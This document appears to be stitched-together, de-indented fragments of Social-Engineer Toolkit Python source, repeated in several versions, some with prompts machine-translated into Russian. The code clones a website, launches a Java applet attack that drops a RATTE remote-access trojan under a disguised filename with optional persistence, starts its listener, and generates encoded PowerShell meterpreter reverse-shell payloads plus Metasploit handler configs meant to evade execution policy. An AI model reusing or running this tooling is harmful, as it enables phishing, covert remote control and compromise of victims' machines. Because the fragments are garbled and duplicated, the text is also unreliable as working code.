def main():
valid_site = False
valid_ip = False
valid_persistence = False
input_counter= 0
site_input_counter=0
#pause=raw_input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while valid_site != True and site_input_counter < 3:
website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
site = urlparse.urlparse(website)
if site.scheme == "http" or site.scheme == "https":
if site.netloc != "":
valid_site = True
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC)
sleep(4)
return
else:
core.print_warning("I can't determine the fqdn or IP of the site. Try again?")
site_input_counter += 1
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
core.print_warning("I couldn't determine whether this is an http or https site. Try again?")
site_input_counter +=1
#core.DebugInfo("site.scheme is: %s " % site.scheme)
#core.DebugInfo("site.netloc is: %s " % site.netloc)
#core.DebugInfo("site.path is: %s " % site.path)
#core.DebugInfo("site.params are: %s " % site.params)
#core.DebugInfo("site.query is: %s " % site.query)
#core.DebugInfo("site.fragment is: %s " % site.fragment)
while valid_ip != True and input_counter < 3:
ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
#javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(raw_input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]")))
while javaport == 0 or javaport > 65535:
if javaport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if javaport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
javaport = int(raw_input(core.setprompt(["9", "2"],"Port Java applet should listen on [80]")))
except ValueError:
#core.print_info("Port set to default of 80")
javaport = 80
#javaport=80
try:
ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
if ratteport == javaport:
core.print_warning("Port must not be equal to javaport!")
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
except ValueError:
ratteport = 8080
persistent = core.yesno_prompt(["9","2"], "Should RATTE be persistentententent [no|yes]?")
# j0fer 06-27-2012 # while valid_persistence != True:
# j0fer 06-27-2012 # persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 # persistent=str.lower(persistent)
# j0fer 06-27-2012 # if persistent == "no" or persistent == "n":
# j0fer 06-27-2012 # persistent="NO"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y":
# j0fer 06-27-2012 # persistent="YES"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # else:
# j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES)
customexe=raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
#######################################
# prepare RATTE
#######################################
prepare_ratte(ipaddr,ratteport,persistent,customexe)
######################################
# Java Applet Attack to deploy RATTE
#######################################
core.print_info("Starting java applet attack...")
java_applet_attack_tw(website,javaport, "reports/",ipaddr)
fileopen=file("%s/src/program_junk/rand_gen" % (definepath), "r")
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" % (definepath,definepath,ratte_random), shell=True).wait()
#######################
# start ratteserver
#######################
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
return
def main():
valid_site = False
valid_ip = False
valid_persistence = False
input_counter = 0
site_input_counter = 0
#pause=raw_input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while valid_site != True and site_input_counter < 3:
website = raw_input(
core.setprompt(["9", "2"],
"Enter website to clone (ex. https://gmail.com)"))
site = urlparse.urlparse(website)
if site.scheme == "http" or site.scheme == "https":
if site.netloc != "":
valid_site = True
else:
if site_input_counter == 2:
core.print_error(
"\nMaybe you have the address written down wrong?" +
core.bcolors.ENDC)
sleep(4)
return
else:
core.print_warning(
"I can't determine the fqdn or IP of the site. Try again?"
)
site_input_counter += 1
else:
if site_input_counter == 2:
core.print_error(
"\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
core.print_warning(
"I couldn't determine whether this is an http or https site. Try again?"
)
site_input_counter += 1
#core.DebugInfo("site.scheme is: %s " % site.scheme)
#core.DebugInfo("site.netloc is: %s " % site.netloc)
#core.DebugInfo("site.path is: %s " % site.path)
#core.DebugInfo("site.params are: %s " % site.params)
#core.DebugInfo("site.query is: %s " % site.query)
#core.DebugInfo("site.fragment is: %s " % site.fragment)
while valid_ip != True and input_counter < 3:
ipaddr = raw_input(
core.setprompt(["9", "2"],
"Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error(
"\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
#javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(
raw_input(
core.setprompt(["9", "2"],
"Port Java applet should listen on [80]")))
while javaport == 0 or javaport > 65535:
if javaport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if javaport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
javaport = int(
raw_input(
core.setprompt(["9", "2"],
"Port Java applet should listen on [80]")))
except ValueError:
#core.print_info("Port set to default of 80")
javaport = 80
#javaport=80
try:
ratteport = int(
raw_input(
core.setprompt(["9", "2"],
"Port RATTE Server should listen on [8080]")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
if ratteport == javaport:
core.print_warning("Port must not be equal to javaport!")
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(
raw_input(
core.setprompt(
["9", "2"],
"Port RATTE Server should listen on [8080]")))
except ValueError:
ratteport = 8080
persistent = core.yesno_prompt(
["9", "2"], "Should RATTE be persistentententent [no|yes]?")
# j0fer 06-27-2012 # while valid_persistence != True:
# j0fer 06-27-2012 # persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 # persistent=str.lower(persistent)
# j0fer 06-27-2012 # if persistent == "no" or persistent == "n":
# j0fer 06-27-2012 # persistent="NO"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y":
# j0fer 06-27-2012 # persistent="YES"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # else:
# j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES)
customexe = raw_input(
core.setprompt([
"9", "2"
], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
#######################################
# prepare RATTE
#######################################
prepare_ratte(ipaddr, ratteport, persistent, customexe)
######################################
# Java Applet Attack to deploy RATTE
#######################################
core.print_info("Starting java applet attack...")
java_applet_attack_tw(website, javaport, "reports/", ipaddr)
fileopen = file("%s/src/program_junk/rand_gen" % (definepath), "r")
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" %
(definepath, definepath, ratte_random),
shell=True).wait()
#######################
# start ratteserver
#######################
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
return
def main():
valid_site = False
valid_ip = False
valid_response = False
input_counter = 0
#################
# get User Input
#################
# ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
# try:
# ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
# while ratteport==0 or ratteport > 65535:
# print_warning('Port must not be equal to javaport!')
# ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
# except ValueError:
# ratteport=8080
try:
ratteport = int(input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(input(core.setprompt(["9", "2"], "Enter port RATTE Server should listen on [8080]")))
except ValueError:
# core.print_info("Port set to default of 8080")
ratteport = 8080
# persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# if persistent == 'no' or persistent == '' or persistent == 'n':
# persistent='NO'
# else:
# persistent='YES'
while not valid_response:
persistent = input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
persistent = str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent = "NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent = "YES"
valid_response = True
else:
core.print_warning(text.YES_NO_RESPONSES)
valid_response = False
customexe = input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
############
# prepare RATTE
############
prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.print_status("Payload has been exported to %s" % os.path.join(core.setdir + "ratteM.exe"))
###################
# start ratteserver
###################
# prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
# if prompt == "yes" or prompt == "" or prompt == "y":
# print_info("Starting ratteserver...")
# ratte_listener_start(ratteport)
while not valid_response:
prompt = input(core.setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
prompt = str.lower(prompt)
if prompt == "no" or prompt == "n":
# prompt = "NO"
core.print_error("Aborting...")
sleep(2)
valid_response = True
elif prompt == "yes" or prompt == "y":
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
core.print_info("Stopping ratteserver...")
sleep(2)
valid_response = True
else:
core.print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
def main():
valid_site = False
valid_ip = False
valid_response = False
input_counter = 0
#################
# get User Input
#################
# ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = input(
core.setprompt(["9", "2"],
"Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error(
"\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
# try:
# ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
# while ratteport==0 or ratteport > 65535:
# print_warning('Port must not be equal to javaport!')
# ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
# except ValueError:
# ratteport=8080
try:
ratteport = int(
input(
core.setprompt(["9", "2"],
"Port RATTE Server should listen on [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(
input(
core.setprompt(
["9", "2"],
"Enter port RATTE Server should listen on [8080]")))
except ValueError:
# core.print_info("Port set to default of 8080")
ratteport = 8080
# persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# if persistent == 'no' or persistent == '' or persistent == 'n':
# persistent='NO'
# else:
# persistent='YES'
while not valid_response:
persistent = input(
core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
persistent = str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent = "NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent = "YES"
valid_response = True
else:
core.print_warning(text.YES_NO_RESPONSES)
valid_response = False
customexe = input(
core.setprompt([
"9", "2"
], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
############
# prepare RATTE
############
prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.print_status("Payload has been exported to %s" %
os.path.join(core.userconfigpath, "ratteM.exe"))
###################
# start ratteserver
###################
# prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
# if prompt == "yes" or prompt == "" or prompt == "y":
# print_info("Starting ratteserver...")
# ratte_listener_start(ratteport)
while not valid_response:
prompt = input(
core.setprompt(["9", "2"],
"Start the ratteserver listener now [yes|no]"))
prompt = str.lower(prompt)
if prompt == "no" or prompt == "n":
# prompt = "NO"
core.print_error("Aborting...")
sleep(2)
valid_response = True
elif prompt == "yes" or prompt == "y":
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
core.print_info("Stopping ratteserver...")
sleep(2)
valid_response = True
else:
core.print_warning(
"valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
def main():
valid_site = False
valid_ip = False
# valid_persistence = False
input_counter = 0
site_input_counter = 0
ipaddr = None
website = None
# pause=input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while not valid_site and site_input_counter < 3:
website = input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
site = urlparse(website)
if site.scheme == "http" or site.scheme == "https":
if site.netloc != "":
valid_site = True
else:
if site_input_counter == 2:
core.print_error("\nМожет быть, вы неправильно записали адрес?" + core.bcolors.ENDC)
sleep(4)
return
else:
core.print_warning("Я не могу определить fqdn или IP сайта. Попробуй снова?")
site_input_counter += 1
else:
if site_input_counter == 2:
core.print_error("\nМожет быть, вы неправильно записали адрес?")
sleep(4)
return
else:
core.print_warning("Я не мог определить, является ли это http или https сайтом. Попробуй снова?")
site_input_counter += 1
# core.DebugInfo("site.scheme is: %s " % site.scheme)
# core.DebugInfo("site.netloc is: %s " % site.netloc)
# core.DebugInfo("site.path is: %s " % site.path)
# core.DebugInfo("site.params are: %s " % site.params)
# core.DebugInfo("site.query is: %s " % site.query)
# core.DebugInfo("site.fragment is: %s " % site.fragment)
while not valid_ip and input_counter < 3:
ipaddr = input(core.setprompt(["9", "2"], "Введите IP-адрес для подключения"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nМожет быть, вы неправильно записали адрес?")
sleep(4)
return
else:
input_counter += 1
# javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]")))
while javaport == 0 or javaport > 65535:
if javaport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if javaport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]")))
except ValueError:
# core.print_info("Port set to default of 80")
javaport = 80
try:
ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
if ratteport == javaport:
core.print_warning("Порт не должен быть равен javaport!")
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]")))
except ValueError:
ratteport = 8080
persistent = core.yesno_prompt(["9", "2"], "Должен ли RATTE быть постоянным [no|yes]?")
# j0fer 06-27-2012 # while valid_persistence != True:
# j0fer 06-27-2012 # persistent=input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 # persistent=str.lower(persistent)
# j0fer 06-27-2012 # if persistent == "no" or persistent == "n":
# j0fer 06-27-2012 # persistent="NO"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y":
# j0fer 06-27-2012 # persistent="YES"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # else:
# j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES)
customexe = input(core.setprompt(["9", "2"], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]? "))
#######################################
# prepare RATTE
#######################################
prepare_ratte(ipaddr, ratteport, persistent, customexe)
######################################
# Java Applet Attack to deploy RATTE
#######################################
core.print_info("Запуск атаки Java-апплета..")
java_applet_attack_tw(website, javaport, "reports/", ipaddr)
with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen:
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait()
#######################
# start ratteserver
#######################
core.print_info("Стартовый ратсервер...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
return
def prep_powershell_payload():
# grab stage encoding flag
stage_encoding = core.check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
# check to see if we are just generating powershell code
powershell_solo = core.check_options("POWERSHELL_SOLO")
# check if port is there
port = core.check_options("PORT=")
# check if we are using auto_migrate
auto_migrate = core.check_config("AUTO_MIGRATE=")
# check if we are using pyinjection
pyinjection = core.check_options("PYINJECTION=")
if pyinjection == "ON":
# check to ensure that the payload options were specified right
if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")):
pyinjection = "on"
core.print_status("Multi/Pyinjection was specified. Overriding config options.")
else:
pyinjection = "off"
# grab ipaddress
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input("Enter the ipaddress for the reverse connection: ")
core.update_options("IPADDR=" + ipaddr)
# check to see if we are using multi powershell injection
multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower()
# turn off multi injection if pyinjection is specified
if pyinjection == "on":
multi_injection = "off"
# check what payloads we are using
powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
# if we specified a hostname then default to reverse https/http
if not core.validate_ip(ipaddr):
powershell_inject_x86 = "windows/meterpreter/reverse_http"
# prompt what port to listen on for powershell then make an append to the current
# metasploit answer file
if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
# if we have multi injection on, don't worry about these
if multi_injection != "on" and pyinjection == "off":
core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if not port:
port = "443"
with open(os.path.join(core.setdir, "meta_config_multipyinjector")) as fileopen:
data = fileopen.read()
match = re.search(port, data)
if not match:
with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD {0}\n"
"set LHOST {1}\n"
"set LPORT {2}\n"
"set EnableStageEncoding {3}\n"
"set ExitOnSession false\n"
"exploit -j\n".format(powershell_inject_x86, ipaddr, port, stage_encoding))
# if we have multi injection on, don't worry about these
if multi_injection != "on" and pyinjection == "off":
# check to see if the meta config multi pyinjector is there
if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
if core.check_options("PORT=") != 0:
port = core.check_options("PORT=")
# if port.options isnt there then prompt
else:
port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if not port:
port = "443"
core.update_options("PORT={0}".format(port))
# turn off multi_injection if we are riding solo from the powershell menu
if powershell_solo == "ON":
multi_injection = "off"
pyinjection = "on"
# if we are using multi powershell injection
if multi_injection == "on" and pyinjection == "off":
core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...")
# define a base variable
x86 = ""
# specify a list we will use for later
multi_injection_x86 = ""
# here we do some funky loops so we don't need to rewrite the code below
if multi_injection == "on":
port = core.check_config("POWERSHELL_MULTI_PORTS=")
port = port.split(",")
if multi_injection == "on":
# iterate through the ports, used for POWERSHELL_MULTI_PORTS
for ports in port:
# dont cycle through if theres a blank
if ports:
core.print_status("Generating x86-based powershell injection code for port: {0}".format(ports))
multi_injection_x86 = multi_injection_x86 + "," + core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86)
if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
port_check = core.check_ports(os.path.join(core.setdir, "meta_config_multipyinjector"), ports)
if not port_check:
with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD {0}\n"
"set LHOST {1}\n"
"set EnableStageEncoding {2}\n"
"set LPORT {3}\n"
"set ExitOnSession false\n"
"exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))
# if we aren't using multi pyinjector
if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
# if meta config isn't created yet then create it
if not os.path.isfile():
with open(os.path.join(core.setdir, "meta_config"), "w") as filewrite:
filewrite.write("")
port_check = core.check_ports(os.path.join(core.setdir, "meta_config"), ports)
if not port_check:
with open(os.path.join(core.setdir, "meta_config"), "a") as filewrite:
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD {0}\n"
"set LHOST {1}\n"
"set EnableStageEncoding {2}\n"
"set ExitOnSession false\n"
"set LPORT {3}\n"
"exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))
# here we do everything if pyinjection or multi pyinjection was specified
if pyinjection == "on":
injections = []
# read in the file we need for parsing
with open(os.path.join(core.setdir, "payload_options.shellcode")) as fileopen:
payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
payloads = payloads.split(",")
# format: payload<space>port
for payload in payloads:
# format: payload<space>port
payload = payload.split(" ")
powershell_inject_x86 = payload[0]
port = payload[1]
core.print_status("Generating x86-based powershell injection code...")
injections.append(core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86))
multi_injection_x86 = ",".join(injections)
# if its turned to off
if multi_injection == "off" and pyinjection == "off":
core.print_status("Generating x86-based powershell injection code...")
x86 = core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)
# if we are specifying multi powershell injection
if multi_injection == "on" or pyinjection == "on":
x86 = multi_injection_x86[1:] # remove comma at beginning
# check to see if we want to display the powershell command to the user
verbose = core.check_config("POWERSHELL_VERBOSE=")
if verbose.lower() == "on":
core.print_status("Printing the x86 based encoded code...")
time.sleep(3)
print(x86)
with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite:
filewrite.write(x86)
core.print_status("Finished generating powershell injection bypass.")
core.print_status("Encoded to bypass execution restriction policy...")
def main():
valid_site = False
valid_ip = False
valid_response = False
input_counter = 0
#################
# get User Input
#################
# ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = input(
core.setprompt(["9", "2"], "Введите IP-адрес для подключения"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error(
"\nМожет быть, вы неправильно написали адрес?")
sleep(4)
return
else:
input_counter += 1
# try:
# ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
# while ratteport==0 or ratteport > 65535:
# print_warning('Port must not be equal to javaport!')
# ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
# except ValueError:
# ratteport=8080
try:
ratteport = int(
input(
core.setprompt(
["9", "2"],
"Порт RATTE Server должен прослушивать [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(
input(
core.setprompt(
["9", "2"],
"Введите порт RATTE Сервер должен прослушивать [8080]")
))
except ValueError:
# core.print_info("Port set to default of 8080")
ratteport = 8080
# persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# if persistent == 'no' or persistent == '' or persistent == 'n':
# persistent='NO'
# else:
# persistent='YES'
while not valid_response:
persistent = input(
core.setprompt(["9", "2"],
"Должен ли RATTE быть постоянным [no|yes]?"))
persistent = str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent = "NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent = "YES"
valid_response = True
else:
core.print_warning(text.YES_NO_RESPONSES)
valid_response = False
customexe = input(
core.setprompt([
"9", "2"
], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]?"
))
############
# prepare RATTE
############
prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.print_status("Полезная нагрузка была экспортирована в %s" %
os.path.join(core.userconfigpath, "ratteM.exe"))
###################
# start ratteserver
###################
# prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
# if prompt == "yes" or prompt == "" or prompt == "y":
# print_info("Starting ratteserver...")
# ratte_listener_start(ratteport)
while not valid_response:
prompt = input(
core.setprompt(["9", "2"],
"Запустите слушатель ratteserver сейчас [yes|no]"))
prompt = str.lower(prompt)
if prompt == "no" or prompt == "n":
# prompt = "NO"
core.print_error("Aborting...")
sleep(2)
valid_response = True
elif prompt == "yes" or prompt == "y":
core.print_info("Старт ратсервер...")
ratte_listener_start(ratteport)
core.print_info("Остановка ратсервера...")
sleep(2)
valid_response = True
else:
core.print_warning(
"действительные ответы 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
